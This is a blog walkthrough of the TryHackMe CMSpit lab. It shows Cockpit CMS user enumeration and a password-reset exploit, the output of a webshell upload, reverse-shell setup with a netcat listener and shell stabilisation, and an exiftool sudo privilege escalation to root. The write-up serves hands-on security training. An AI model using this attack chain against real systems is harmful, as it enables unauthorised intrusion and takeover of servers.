narancs's blog

TryHackMe – CMSpit walkthrough


Logo of CMSpit room on TryHackMe

This is a walkthrough of CMSpit room on TryHackMe. We need gain access to the target machine through a vulnerable CMS and escalate to root.

You've identified that the CMS installed on the web server has several vulnerabilities that allow attackers to enumerate users and change account passwords. Your mission is to exploit these vulnerabilities and compromise the web server.


What is the name of the Content Management System (CMS) installed on the server?

We can get this answer from the login page of the website.


What is the version of the Content Management System (CMS) installed on the server?

I found the answer by checking the source code of the login page.


What is the path that allow user enumeration?

By knowing the CMS name and the version, we can start looking for known exploits. I found the following website that explains the exploit in great detail: At section 1 ‘Using the $eq operator’, there are several screenshots taken from Burp Suite that show the URL path in question.


How many users can you identify when you reproduce the user enumeration attack?

I found an exploit for this vulnerability on GitHub:

The code is sending 2 requests through a proxy:

resetrequest = + "/auth/requestreset" , json=request_data , proxies={"http" :""})
token_request = + "/auth/resetpassword"  , json=token_data , proxies={"http" :""})
So we need to start a proxy on port 8080 (e.g. BurpSuite), or remove the proxies={"http" :""} arguments from the 2 function calls in the code. Then we can execute the script against the target.
					python3 http://<IP_ADDRESS>/


					Number of users in the output of the script :)
What is the path that allows you to change user account passwords?

Answer can be found in above script on GitHub by looking at the change_pass function and checking the URL path where it sends a request.




Compromise the Content Management System (CMS). What is Skidy's email.

If you have successfully executed the script above, then you can see in the output that the password of the admin user has been changed to P@ssw0rd. We can login with these credentials and visit the /accounts page to find the email address of Skidy.


					The e-mail address of Skidy user from /accounts page
What is the web flag?

You can also see something similar in the output of the script:

					[+] Bingoo, File has been deployed successfully : vd1XDi.php
[+] File's location :
[*] Execution example :
[+] Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Good luck for Privilege Escalation :)

This means that a webshell was uploaded to the target, and we can execute commands with it.


Once we visit this page, we will see a list of the files in the root directory of the webserver. We can see that there is a file named webflag.php, so we can use the cat command to display the output of this file. Then we need to view the source code of the page, otherwise the output is not visible as it is a PHP code.



					Grab the flag from webflag.php
Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?
I have gained a shell on the target using the following steps:
  • I downloaded the reverse shell from
  • I changed the following lines accordingly
    $ip = ''; // CHANGE THIS
    $port = 1234; // CHANGE THIS
  • I started a Python HTTP server to server the file over HTTP
    python3 -m http.server
  • I used the webshell to download the reverse shell on the target machine
  • I started a listener on the port I specified in the reverse shell
    nc -lvnp 1234
  • I visited and I received a shell.

Then I stabilized the shell with the following commands:

					python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
I started look around on the host. Finally, I found a file in the home directory of stux named .dbshell. One of the commands in the file contained the flag that was inserted in the database.


					Get the flag from the .dbshell file
What is the user.txt flag?
The .dbshell file contains a command that was used to insert the user stux into the database. We can use the same password to switch to stux user on Linux, because the password was re-used.


					Switch to stux user with su command and grab the flag from user.txt
What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000

We can check what commands can stux execute with sudo.

					stux@ubuntu:~$ sudo -l
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass,
User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool

I checked for vulnerabilities of exiftool and I found the following:


What is the utility used to create the PoC file?

I found an exploit for the vulnerability here:

In the script file, there is a function called dependencies that defined the following variable.

					    deps = {'bzz':"sudo apt install djvulibre-bin",'djvumake':"sudo apt install djvulibre-bin",'exiftool':"sudo apt install exiftool"}

The name of the utility is listed in these dependencies.


Escalate your privileges. What is the flag in root.txt?

Using the exploit at we can create a malicious jpg file on our local machine. Then we can transfer that file to the target to perform the exploit.

Install the dependencies

					sudo apt install djvulibre-bin exiftool

Run the exploit

					python3 -c '/bin/bash'

Transfer the file to the target (e.g. using Python HTTP server).

Use exiftool on the target, and get the root flag!

Table of Contents

Notify of
Inline Feedbacks
View all comments

Related posts

Would love your thoughts, please comment.x